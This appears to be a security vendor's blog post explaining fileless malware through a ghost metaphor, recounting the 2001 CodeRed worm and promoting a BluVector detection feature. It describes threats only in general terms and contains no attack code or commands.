The Fileless Malware Ghosts in Your Hosts

Fileless malware variants are like ghosts: Many stories surround them, but they rarely reveal themselves on demand, even to trained hunters. Fileless infections instead seem to appear, suddenly and without warning, when we least expect them. Discovery is often by accident or coincidence.

Yet the specter of fileless malware is a growing concern because confirmed sightings appear to be increasing. For instance, in February, security researchers discovered fileless malware on the networks of 140 banks across 40 countries. Although industry-wide statistics on fileless infections can be hard to come by, cursory clues, such as Google searches, indicate a growing number of online investigations since 2015.

Fileless malware is spooky, in part, because it doesn’t behave like traditional file-based malware, which contains a signature that anti-virus products can use for future detection. File-based malware is usually detectable using traditional computer forensic tools.

In contrast, fileless malware resides in its hosts’ random access memory (RAM), which means it leaves no trace of itself on hard disk drives. When an infected host is powered down, the fileless malware disappears like an apparition, leaving no forensic clues.

But fileless malware often contains additional capabilities to help it remain elusive. For instance, fileless malware often haunts hosts by using their own systems and administrative tools against them, a tactic that security researchers call “living off the land.” While this can lead to machina in exspiravit behaviors, fileless malware does not necessarily introduce anything observably unusual into the environment, making detection more difficult.

Fileless Malware Ghosts of Times Past

Just as the concept of ghosts long outlasts specific stories, which tend to morph over time and be historically and culturally situated, the concept of fileless malware is nothing new. It dates to the 1990s and the dawn of the World Wide Web, but the specifics of recent accounts have changed in key ways from historical manifestations.

Fileless malware did not gain widespread attention until researchers discovered its role in one the most infamous global cyberattacks in history.

On July 12, 2001, still-unknown hackers introduced a computer worm into the wild. The first version of the worm exploited a buffer overflow vulnerability in Microsoft IIS servers and then used a static seed to self-propagate. The static seed caused the first version to spread slowly and resulted in minor damage (primarily a defacing message that read, “Hacked by Chinese”). But, on July 15, two researchers at eEye Digital Security spotted the worm’s activities in security logs and began investigating.

Seven days later, on July 19, the anonymous hackers released a second variant into the wild. This second contained a single difference from the first: the use of a random seed rather than a static seed to spread.

This second version infected 359,000 machines in 14 hours. (By comparison, the WannaCry ransomware outbreak in May infected approximately 250,000 devices in 150 countries in several hours.)

And that’s how the “memory-resident” CodeRed worm – so named because the researchers who discovered it drank Code Red Mountain Dew while reverse engineering it – made fileless malware history.

Today’s Fileless Malware Threat

Fileless malware is worth hunting today because of its growing prevalence combined with its often more sophisticated capabilities, which are far graver than silly defacements.

Many current fileless malware variants sport robust functionality for cyberespionage and advanced multi-stage attacks, including the ability to establish persistent backdoors, exfiltrate data, and connect to remote command & control servers for further instructions and additional payloads.

Given the difficulty of detecting fileless malware, BluVector is preparing a new feature to help combat fileless malware at the network edge. The use of this new technology will allow BluVector customers to find fileless malware traversing the network. We invite you to contact us in the meantime to discuss how we can protect your environment from the uncanny threat of fileless malware by putting BluVector to the test.

Tags: , , ,

Interested in learning about BluVector?Contact Us >